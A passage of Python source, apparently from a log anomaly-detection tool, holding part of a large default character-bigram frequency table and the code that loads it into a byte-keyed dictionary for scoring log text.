20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], 
["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], ["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], ["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 
18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], ["h", 5152], ["k", 34], ["m", 374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], ["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], 
["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], ["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], 
["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 
130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], ["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], [":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], 
[":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], ["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], ["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 
26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], ["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], 
["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], ["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], ["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 
40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], ["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], ["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], 
["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], ["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], ["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], 
["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], [">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], ["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], 
["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], ["y", [["!", 1032], [" ", 118640], ["\"", 62], ["'", 1440], [")", 154], ["-", 2010], [",", 18388], [".", 10860], [";", 1366], [":", 466], ["?", 946], [">", 26], ["]", 2], ["_", 4], ["a", 2624], ["`", 2], ["c", 242], ["b", 640], ["e", 11272], ["d", 206], ["g", 138], ["f", 198], ["i", 4422], ["h", 84], ["k", 76], ["m", 714], ["l", 818], ["o", 28106], ["n", 212], ["p", 410], ["s", 8723], ["r", 738], ["u", 58], ["t", 3028], ["w", 464], ["v", 110], ["x", 14], ["z", 40]]], ["}", [[" ", 6], [",", 2]]]]] # skipcq: FLK-E501 for elem in default_f[2]: first_char = int.from_bytes(bytes(elem[0], AminerConfig.ENCODING), 'big') second_char_list = elem[1] self.freq[first_char] = {} for second_char_elem in second_char_list: second_char = int.from_bytes(bytes(second_char_elem[0], AminerConfig.ENCODING), 'big') frequency = second_char_elem[1] self.freq[first_char][second_char] = frequency # Load frequency table from persisted data. Note that this adds to entries in the default frequency table if used. 
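# Tail of __init__: choose the persistence location, merge any previously persisted bigram counts on top of the
# default table filled above, and derive the per-first-byte totals used as denominators in receive_atom.
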